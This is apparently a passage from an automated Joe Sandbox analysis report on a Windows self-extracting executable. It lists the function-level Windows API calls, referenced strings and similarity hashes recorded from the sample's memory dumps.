                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                    • String ID:
                                                                                    • API String ID: 2092733347-0
                                                                                    • Opcode ID: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
                                                                                    • Instruction ID: f583d2db3ec9669b8f681982f0b0e9978481b5ab90780b13c27df6cb8ad16a9f
                                                                                    • Opcode Fuzzy Hash: aa70cca98942cbb61df05f87876cba04bae89d46a05a761bdc057f26395169cc
                                                                                    • Instruction Fuzzy Hash: 4231E779108346ABC704DFA8C88499BBBF8BF98614F444A1EF999C3210E734D549CBA6
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,?,01022AF1,010202FC,0101FA34), ref: 01022B08
                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01022B16
                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01022B2F
                                                                                    • SetLastError.KERNEL32(00000000,01022AF1,010202FC,0101FA34), ref: 01022B81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                    • String ID:
                                                                                    • API String ID: 3852720340-0
                                                                                    • Opcode ID: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
                                                                                    • Instruction ID: bb55ba9f954199ee4e3bc201621d1030e3cecd48d3f3146a1eda6f64354b6752
                                                                                    • Opcode Fuzzy Hash: aec652aad98712bc9504fbb49be1991999bf2b285a3eeb7c4c2c70fad8b446df
                                                                                    • Instruction Fuzzy Hash: C501F7321083326EAA7B29F8BC84A6B2F9DFF55774B60077AF5D0490D4EF1A48009344
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,01041030,01024674,01041030,?,?,01023F73,00000050,?,01041030,00000200), ref: 010297E9
                                                                                    • _free.LIBCMT ref: 0102981C
                                                                                    • _free.LIBCMT ref: 01029844
                                                                                    • SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 01029851
                                                                                    • SetLastError.KERNEL32(00000000,?,01041030,00000200), ref: 0102985D
                                                                                    • _abort.LIBCMT ref: 01029863
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 3160817290-0
                                                                                    • Opcode ID: f9bd05b72c0f2ed03307d0bf2f0669ed10d9bc7c4bd2694b1c81eabbd4e52be8
                                                                                    • Instruction ID: fef6a1ff4ba0ac7d96841ccccfb77500a72f15c4e6cfb2b33daae18bd342465a
                                                                                    • Opcode Fuzzy Hash: f9bd05b72c0f2ed03307d0bf2f0669ed10d9bc7c4bd2694b1c81eabbd4e52be8
                                                                                    • Instruction Fuzzy Hash: 23F02D35100633E6D7633238BC48B5B2BEDAFE0778F290125F7D496145EE7584068224
                                                                                    APIs
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC47
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0101DC61
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0101DC72
                                                                                    • TranslateMessage.USER32(?), ref: 0101DC7C
                                                                                    • DispatchMessageW.USER32(?), ref: 0101DC86
                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0101DC91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 2148572870-0
                                                                                    • Opcode ID: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
                                                                                    • Instruction ID: d24f8354f28d46ca2992a11095e7357c1ccffc76a57a4ffd0eac8bcd5c2e9692
                                                                                    • Opcode Fuzzy Hash: 635f22a92cb027aa0703d0f65f06501b797d68e9e0d30b2249c1231a59e6a566
                                                                                    • Instruction Fuzzy Hash: 8BF08C32A0021ABBDB306AE5EC4CDCBBFBCFF42791B004411F54AD6018D63A804AC7E0
                                                                                    APIs
                                                                                      • Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0
                                                                                      • Part of subcall function 0100B92D: _wcsrchr.LIBVCRUNTIME ref: 0100B944
                                                                                    • _wcslen.LIBCMT ref: 0100C197
                                                                                    • _wcslen.LIBCMT ref: 0100C1DF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                    • String ID: .exe$.rar$.sfx
                                                                                    • API String ID: 3513545583-31770016
                                                                                    • Opcode ID: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
                                                                                    • Instruction ID: f8fdc0eb304a38a48822d4014724dbe1f3f42bbe1e60aee1189b1e60e97c2f4e
                                                                                    • Opcode Fuzzy Hash: 76a10fb00ac954ed3ccca9f16ff187693d838d8b44eaa8a3e2464dfa2e60e0e2
                                                                                    • Instruction Fuzzy Hash: 3C414821540312A6F733AF788A41ABB77E8EF42704F100ACEF9C56B4C0EB6449C2C391
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000800,?), ref: 0101CE9D
                                                                                      • Part of subcall function 0100B690: _wcslen.LIBCMT ref: 0100B696
                                                                                    • _swprintf.LIBCMT ref: 0101CED1
                                                                                      • Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5
                                                                                    • SetDlgItemTextW.USER32(?,00000066,0104946A), ref: 0101CEF1
                                                                                    • EndDialog.USER32(?,00000001), ref: 0101CFFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                                    • String ID: %s%s%u
                                                                                    • API String ID: 110358324-1360425832
                                                                                    • Opcode ID: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
                                                                                    • Instruction ID: 2a6ccd115dbcf8699bc6ce260b7aa61646cbd0c5dabdd4af58eddabe270d4c14
                                                                                    • Opcode Fuzzy Hash: 0c0ea83e644ad4615165ca0aeade4673aae32a78bc128b18b27bfe0b96427931
                                                                                    • Instruction Fuzzy Hash: 3541A8B1940659AADF219B94CD44EEE77FCEB45300F4080A6F989E7049DE798A44CF60
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 0100BB27
                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0100A275,?,?,00000800,?,0100A23A,?,0100755C), ref: 0100BBC5
                                                                                    • _wcslen.LIBCMT ref: 0100BC3B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                    • String ID: UNC$\\?\
                                                                                    • API String ID: 3341907918-253988292
                                                                                    • Opcode ID: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
                                                                                    • Instruction ID: 5968d4eefcf2566524364e8e65dac9968c17bf7c32b67e8de69d086888e5e094
                                                                                    • Opcode Fuzzy Hash: b0b66b5bd8b20d0bbfacba301a61c41478c93a00fcbf4c3ee7ee8713044c90e6
                                                                                    • Instruction Fuzzy Hash: EA419F3944021BA6EF22AF64CC40EEE77ADBF55390F1044A6F9D4A7294EF74D9908B60
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\9FwQYJSj4N.exe,00000104), ref: 01027FAE
                                                                                    • _free.LIBCMT ref: 01028079
                                                                                    • _free.LIBCMT ref: 01028083
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$FileModuleName
                                                                                    • String ID: C:\Users\user\Desktop\9FwQYJSj4N.exe$%I
                                                                                    • API String ID: 2506810119-140885748
                                                                                    • Opcode ID: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
                                                                                    • Instruction ID: cf22fffd97cf6ec76734889ef236c0dfa12372b9c171a01b559e565830542d4a
                                                                                    • Opcode Fuzzy Hash: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
                                                                                    • Instruction Fuzzy Hash: 3C31A275A04229EFDB61DF99D880D9EBBFCEF99310F1080ABF98497210D6759A40CB51
                                                                                    APIs
                                                                                    • LoadBitmapW.USER32(00000065), ref: 0101B6ED
                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0101B712
                                                                                    • DeleteObject.GDI32(00000000), ref: 0101B744
                                                                                    • DeleteObject.GDI32(00000000), ref: 0101B767
                                                                                      • Part of subcall function 0101A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
                                                                                      • Part of subcall function 0101A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
                                                                                      • Part of subcall function 0101A6C2: LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
                                                                                      • Part of subcall function 0101A6C2: LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
                                                                                      • Part of subcall function 0101A6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
                                                                                      • Part of subcall function 0101A6C2: GlobalLock.KERNEL32(00000000), ref: 0101A73E
                                                                                      • Part of subcall function 0101A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
                                                                                      • Part of subcall function 0101A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
                                                                                      • Part of subcall function 0101A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
                                                                                      • Part of subcall function 0101A6C2: GlobalFree.KERNEL32(00000000), ref: 0101A7CD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                    • String ID: ]
                                                                                    • API String ID: 1797374341-3352871620
                                                                                    • Opcode ID: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
                                                                                    • Instruction ID: 16b712900256b6ea0c26d4577ff3b0f1e10799bc8fd98efc3037b37251e17052
                                                                                    • Opcode Fuzzy Hash: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
                                                                                    • Instruction Fuzzy Hash: 9901D636641202A7E72277785D08ABF7AF9BF80662F080050F9C4A729CDF7E8C0946A0
                                                                                    APIs
                                                                                      • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                                                      • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                                                    • EndDialog.USER32(?,00000001), ref: 0101D64B
                                                                                    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0101D661
                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0101D675
                                                                                    • SetDlgItemTextW.USER32(?,00000068), ref: 0101D684
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemText$DialogWindow
                                                                                    • String ID: RENAMEDLG
                                                                                    • API String ID: 445417207-3299779563
                                                                                    • Opcode ID: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
                                                                                    • Instruction ID: 3da7e24464a8ba92c67c79d341b1c875edef76f88cc7230921703cb23582bbf6
                                                                                    • Opcode Fuzzy Hash: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
                                                                                    • Instruction Fuzzy Hash: AD01F933244310BAE3214FA85E0DF5B7B9CBB5E701F010810F3C5A509DC7AF95048765
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027E93
                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01027EA6
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027EC9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                    • API String ID: 4061214504-1276376045
                                                                                    • Opcode ID: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
                                                                                    • Instruction ID: 9d8f774f1337a7ca9331fd5aafe7b40034a9611998c0449c968f6364b85c0149
                                                                                    • Opcode Fuzzy Hash: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
                                                                                    • Instruction Fuzzy Hash: 5CF06831900218BBDF219FA5DC49B9EBFBDFF44715F0041A9F845A6254DB3A9E44CBA0
                                                                                    APIs
                                                                                      • Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                                                      • Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                                                    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
                                                                                    • GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                                                    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                                                    • API String ID: 2141747552-1753850145
                                                                                    • Opcode ID: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
                                                                                    • Instruction ID: 4dc47194e12eb4000521233aebb11717160d793e7e853d70aeab022ca3f212dc
                                                                                    • Opcode Fuzzy Hash: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
                                                                                    • Instruction Fuzzy Hash: 09E04F70D10B029ED7319B799588B41BAD87F44610F14885DF0DADB645DBB9D0818B50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: AdjustPointer$_abort
                                                                                    • String ID:
                                                                                    • API String ID: 2252061734-0
                                                                                    • Opcode ID: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
                                                                                    • Instruction ID: d77efd25ce6cdc8946388eb885a86333e916e2e7f5dd8850480e39ebe6793ff3
                                                                                    • Opcode Fuzzy Hash: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
                                                                                    • Instruction Fuzzy Hash: DF510671600326AFEB29AFD8D840BBAB7E4FF54310F24416DED85476A1D772E950CB90
                                                                                    APIs
                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C
                                                                                      • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
                                                                                    • _free.LIBCMT ref: 0102BF95
                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2088532078.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2088514666.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088557238.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088602339.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2088709388.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1000000_9FwQYJSj4N.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                    • String ID:
                                                                                    • API String ID: 336800556-0
                                                                                    • Opcode ID: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
                                                                                    • Instruction ID: 16c463447fe1139e3b3a2d5e9b34ac76e51a92e10dc0e862056522a5c2d1192e
                                                                                    • Opcode Fuzzy Hash: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
                                                                                    • Instruction Fuzzy Hash: 0D01D476601A317F3761157A5C8CDBB7FBDEEC2AA03140169FA84C6104EA668C0186B0
                                                                                    APIs
